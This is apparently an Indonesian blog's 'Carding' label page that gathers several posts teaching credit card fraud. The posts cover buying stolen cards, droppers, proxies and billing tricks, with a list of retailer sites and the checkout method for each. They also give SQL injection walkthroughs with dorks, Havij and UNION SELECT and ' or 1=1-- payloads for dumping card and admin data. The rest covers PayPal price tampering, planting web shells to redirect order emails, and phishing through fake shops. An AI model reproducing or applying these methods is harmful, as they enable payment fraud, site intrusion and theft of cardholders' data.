Articles by "Carding"
Showing posts with label Carding. Show all posts
1. Sediakan CC terlebih dahulu.
Ini point utama gan. Kalo ini gak punya, ngapain susah2 baca tutornya ampe bawah hehehe. Cari cc nya dimana gan? Ya lo cari sendiri gan atau lo juga bisa beli cc. Kalo mau beli cc, belinya sama orang indo aja gan. Cari seller yg terpercaya.

2. Kalo udah punya cari cardable site.
Untuk pertama, lo gak usah main yg gede-gede gan. Cari aja online store yg biasa aja. Jgn main online store yg udah keren mampus seperti ebay, amazon, dll.

3. Cari Dropper
Dropper utk apa gan? Kali aja agan order yg gak ship ampe ke indonesia. Nah, agan bisa gunakan jasa dropper. Misal jasa dropper USA to Indonesia...us2indo. Silahkan di googling gan. Banyak kok penyedia jasa dropper.

4. Gunakan VPN atau Proxy
Untuk point yang ini jg harus lo pahami gan. Kalo polosan make IP adres Indo, bakalan lebih sering decline dan cancel order. Dimana nyari VPN dan proxy gan? Ente cari sendiri aja ya gan. Mau yang berbayar atau gratisan terserah ente. Yg penting work. Slalu cek IP terleb ih dahulu, apakah sesuai dgn IP negara yg lo mau gan, misal USA. Cek IP gmana gan? Jgn terlalu banyak nanya hal-hal yg mudah gan. Usahaaaaa....

Beberapa method penggunaan CC

Method ini tergantung dari online store nya gan. Jadi tiap online store punya method berbeda. Berikut beberapa method penggunaan cc.

1. Bill = Bill
Maksudnya ketika lo mengisi billing, isikan sesuai dengan data CC yg ente punya. Shipp nya tentu alamat ente di indo. Namun jika ship nya gak nyampe indo, makanya lo gunakan jasa dropper. Ini biasanya digunakan pada online store yang memiliki merchant. Agar orderan lo bisa sukses disini, kasih keterangan seolah-olah si punya CC mau ngirim hadiah buat lo gan. Hehehe, pinter-pinter sendiri ngerangkai katanya.

2. Bill = Ship
Online store seperti ini biasanya hanya cek CC doang gan. Nah, jadi maksud Bill = Ship lo isi billing dgn alamat lo dan shiping jg alamat lo tsb. Ya, seolah2 itu CC emang punya lo gan.hehehehe...

3. Bill = Ship | Postal code = Bill
Ini sama seperti point 2 diatas. Bedanya qt gunain postal code yg terdapat pada CC. Jadi misal lo ship ke indo, lo gunain postal code CC jgn postal code ente. Pahaaaaam?? Paham-pahamin aja ya gan. Hahahaha...

4. Bill = Bill | Ship = Bill
Utk method yang ini, lo isi billing dan shipping sesua data CC. Nah, nyampenya gak ke kita dong gan? Sabar gan, kelarin dulu bacanya...
Setelah order sukses, lo kirim email ke salesnya bahwa lo salah input alamat ship. Sertakan alamat ship baru yg lo tuju. Bilang aja lo mau kirim kado ulang tahun buat ponakan lo. Atau apa aja yg lo bisa karang indah.hehehehe..

Gw rasa cuman itu aja dasar-dasar penggunaan cc gan. Buat pertama mulai carding, gak usah ngayal main gede. Bisa am bil $10 aja udah. Kalo lo udah paham, lo hajar deh sesuka lo. Mau datangin iphone tiap bulan, mau cash out ke bank lo, mau lo apain terserah gan. Oke gan, semoga tutorial singkat ini bisa bermanfaat.
===== Trik Orders by BANTEN CYBER ATTACKER TEAM

Site : http://bit.ly/AliExpresS
Method :
Paling gampang ini.. cuma pesan hajar pake cc langsung order dan diterima.. atau bisa dibilang :
- Bill Adress = Ship Adress


=======================================

Site : http://bit.ly/VistaPrintt
Method :
ini juga gampang langsung di proses kok orderannya  yg penting cc Live walaupun balance dikit? tetep ngangkat kok :D
- Bill = Ship
- Polosan/Shocks bisa semua
- CC Public / Privare ( Recommended )



=======================================
Site : http://bit.ly/DXcom
Method :
- Daftar dari nya pake polosan/ssh/vpn atau apalah terserah
- Pas order usahakan menggunakan ip yang sama saat daftar
- Jika ingin mengorder secara berkali-kali dalam 1 hari, usahakan pake cc yang beda, tau gak tunggu yang 1 approve baru di pake lagi
- Bill CC = Ship


=======================================
Site : http://bit.ly/AliBababa
Method :
- Use CC Private And High Limit
- Bill Adress = Ship Adress
- Jangan gunakan cc tadi yang di order di Aliexpress  untuk order di site lain, usahakan tunggu sampai shipped, kalo udah shipped baru boleh pake order di site yang lain.
- Usahakan pake Socks5, jangan pakai VPN !


=======================================
Site : http://bit.ly/DrJaysz
Method :
- Use CC Private
- Bill = Ship
- Use VPN/Socks5/Proxy/Polosan


=======================================
Site : http://bit.ly/ryanhigA
Method :
- Bill = Ship
- Pakai IP Tempat / Negara Yang Akan ente Kirim


=======================================
Site : http://bit.ly/Dravven
Method :
- Bill = Ship
- No Need Socks/VPN


=======================================
Site : http://bit.ly/VolcannoEcigs
Method :
- Bill = Ship
- No Need Socks/VPN


=======================================
Site : http://bit.ly/Eebay
Method :
- Use Socks5
- Use Goods PP / Paypal




=======================================
Site : http://bit.ly/TtmartT
Method :
- Use VPN
- Use Good PP ( Have Balance )
- Use US Dropper


=======================================
Site : http://bit.ly/GetPebble
Method :
- Use Socks5 Yang Sama Dengan Negara CC
- Bill = Ship
- Use Good CC ( Usahakan Sampai Status Barangnya Shipped )
- Agar terhindar dari pajak bisa pake Dropper Malaysia

=======================================
Site : http://bit.ly/BestBuuy
Method :
- Use RDP
- Use Good CC
- Use Us Dropper

=======================================

Site : http://bit.ly/AmazonS
Method :
- Bill = Ship
- Fake Phone Number
- Use Private CC
- Use VPN/Socks5 ( Sesuai Negara CC )
- Worldwide Shipping



=======================================
Site : http://bit.ly/Wallmartt
Method :
- Use Private CC
- Use US Dropper
- Not Need VPN/SOCKS5
=======================================
Site : http://bit.ly/FootballFantastic
Method :
- Bill = Ship
- Use VPN/Shocks5 Sesuai Negara CC


=======================================
Site : Teva Shoes
Method :
- Bill = Ship
- Polosan
- CC Public / Private ( Recommended )


=======================================
Site : Gojane
Method :
- Bill = Ship
- No Need Shocks/VPN


=======================================
Site : Morphsuit
Method :
- Bill = Ship or Bill Not Ship


=======================================
Site : Gratefulapparel
Method :
- Bill = Ship ane pak , waktu nyoba pake BIN 498430


=======================================
Site : Tinydeal
Method :
- Bill = Ship
- Visa non VBV or MasterCard no MSCS


=======================================
Site : WorldmagicShop
Method :
- Bill = Ship
- No Need VPN/Shocks


=======================================
Site : Aztekcomputers
Method :
- Bill = Ship
- No Need VPN/Shocks
- Use Private CC
- Worldwide Shipping


=======================================
Site : MemoryDepot
Method :
- Bill = Ship
- No Need VPN/Shocks
- Use Public & Private CC
- Worldwide Shipping

no image

Kali ini saya akan membagi cara carding ala Dr.D4fuQ404 

PERINGATAN JANGAN MENJADIKAN WEBSITE INDONESIA SEBAGAI TARGET ,, DISINI YANG SAYA SERANG ADALAH ISRAEL :v HAHAHHAH

 :vOKE ADMIN JANGAN BACOT KAPAN MULAI NIH HIIHH 

:3,,OKE2 KITA MULAI COY

DOWNLOAD DLU URL EXTRAKTOR

DOWNLOAD JUGA SQL EXPLOITER
DOWNLAOD VIDOENYA
Thap -tahap yang di lakukan begini caranya :

1. buka google extraktor tadi .lalu masukan dork : product.asp?id= site:il 
2. kamu scan , kalau sudah muncul link-link yang keluar silahkan klik kanan kamu terus
REMOVE DUPLICATE, oke bro
3. lalu pindah ke tab sql Injector Query Builder
4. masukan argumen dengan tanda tanya (?) di insert argument here
5. nah kalau sudah mas bro klik dech BUILD dan scan
6. trus Ke tab berikutnya yaitu tab ATTACK VICTIM
7. cari yang eror result nya :UNCLOSED qoutation mark before the character
8. pokoknya harus gitu lah mas bro
9. klik kanan mas bro lalu copy url victim

TAHAP PEMAKAIAN SQL EXPLOITER :

~buka sql exploiter terus ke tab ATTACKER for the HAckable SIte !!!

~klik Add Manualy, masukan url victim yang tadi mas bro ,trus paste (kadang tanda '(petik) dihilangkan

~kalau udah mas bro klik SIte info sampai info nya keluar

~kalau udah keluar maka tinggal GEt Tables .maka muncul table" web


pilih salah 1 yang ada di table tsb yang kira" dimana letak CC,trus Get Columnsbuat mengetahui columns apa di table itu,kalau bisa ke table orderkalau udah muncul semua columns ,drag semua terus get data
ok., sekian dari saya

no image
INDONESIA HACKER CYBER TEAM

Bahan-bahannya :

1.Dork (ada di sql scanner)
2.Havij (Diutamakan yang pro misalnya: havj 116 pro full Crack)
3.Kesabaran..
4.SQLi Scanner ( download di grup IHCT )
5.internet
6.PC/laptop  

tutor :  
1.Download bahan nya dulu
2.Buka SQLi Scanner nya
3.Masukan Dork di kolom yang tersedia
4.Masukan Jumlah yang diingin kan... Kalo untung testing 10 aja. Kalo udah bener bener mau nyari di dork masukan angka 100 aja..
5.Klik Scan...
6.Tunggu sampai selesai.. (Disaat scanning pasti program SQLi scanner nya not respond)
7. bila sudah selesai masuk ke tab Vuln
8. Buka Havij
9. Masukan Target nya.. (tanpa %27)
10. Klik Scan..
11.Tunggu selesai scanning nya
12. Lalu Kolom Table 
13. Diutamakan untuk DUMP database
14. Klik Get Table
15. Cari Table Order/Member/Email/User
16. Kalo udah ketemu klik get column
17. nanti ada table lagi... cari CCnumber/username/user_id/password/pass
18 Bila udah ketemu Checklist (zipcode,ccvnumber,expdate)
19.Klick Get data..
20.. nikmati aja CC nya :)
no image

INDONESIA HACKER CYBER TEAM



Ini sebenarnya trik lama yang dulu pernah saya coba dan dapet buku 10 biji, cuma saya nggak bisa sebutin situsnya .
Kalo pengen coba ikutin langkah sederhana yang pernah saya coba:
Yang harus Anda punya:
Browser Mozilla Firefox
Account PayPal

Ada yang mau lihat lihat koleksi atau membeli KAOS DAKWAH atau KAOS DISTRO bisa di lihat stok nya di GHIRAH
Ini langkahnya:

1. Lalu cari situs yang jualan barang di internet yang pembayarannya menggunakan PayPal, lalu klik “Buy”
2. Trus klik "Checkout with PayPal"
3. Dan saat keluar teks "You are being automatically forwarded to PayPal's site" lalu cari di browser Mozilla Anda pada menu “View” trus "Page Source" atau tekan “ctrl+U”
4. Simpan source teks tersebut dengan klik "File" lalu "Save page as..."
5. Putuskan koneksi ke internet dan buka kembali file source yang telah Anda “save” tadi, lalu ganti – harga ="49.95 (atau harga barang)" -- dengan – harga ="00.01" –
6. Trus “save”
7. Lalu klik kanan file source tadi dengan "Open with" -- "FireFox"
8. Selanjutnya terserah Anda …





no image


INDONESIA HACKER CYBER TEAM


1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic

# Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:


Ada yang mau lihat lihat koleksi atau membeli KAOS DAKWAH atau KAOS DISTRO bisa di lihat stok nya di GHIRAH


admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb

Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :

http://www.namasitusnya.com/shop/admin/shopadmin.asp

Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil :)

2. Shopping Order Log – Informasi Log Order di Server
# Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.
Contoh:
Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
atau inurl:order filetype:txt / inurl:order filetype:log dsb.
Misal target:

http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt

Selamat menemukan :)

3. Database Information – Database Source Location – Database Path
# Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.

Contoh:
Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/data/vsproducts.mdb

Selamat mencari.. ^^


4. SQL Injection Advanced Shop Vulnreabilty
# Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.

Contoh:
Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb
http://www.targetnya.com/shop/product_details.php?item_id=13
Ganti tulisan itu dengan :
products_rss.php?category_id=1' UNION SELECT concat(login,char(58)
,password),0 FROM va_admins — /*
jadi :http://www.targetnya.com/shop/products_rss.php?category_id=1
‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
dah kalo ada yang errornya kaya gini :

[color="Red"]DB ERROR 1064[/color]

[code]We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

The details of the error are shown below. Please quote this in any correspondance regarding this problem.

Page URL: [url]http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION[/url]

%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:

Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1' UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2' at line 1
[/code]

Nah klo udah jangan lupa decrypt passwordnya ya :)

5. Admin Shop Send Mail Order
# Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.

Contoh:

Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.

Misal target:

[url]http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php[/url]
Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:
var $dbtype = ‘mysql’;
var $host = ‘localhost’;
var $user = ’shop24_admin’;
var $db = ’shopsex_site’;
var $mailer = ‘mail’;
var $ordermailsendto = ‘ben@netboost.com.au‘;

Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.
Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..

6. Phising & Scaming
# Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.
Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.




LINK  WEB
BACA SELENGKAPNYA KAOS
BACA SELENGKAPNYA KAOS COUPLE
BACA SELENGKAPNYA KAOS DAKWAH
BACA SELENGKAPNYA KAOS NASEHAT
BACA SELENGKAPNYA KAOS CYBER
BACA SELENGKAPNYA KAOS MOTIVASI
BACA SELENGKAPNYA KAOS POLOS
BACA SELENGKAPNYA DESAIN KAOS
BACA SELENGKAPNYA MUKENA
BACA SELENGKAPNYA MUKENA BALI
BACA SELENGKAPNYA MUKENA KATUN JEPANG
BACA SELENGKAPNYA  MODEL MUKENA
BACA SELENGKAPNYA  BATIK

BACA SELENGKAPNYA MODEL BAJU BATIK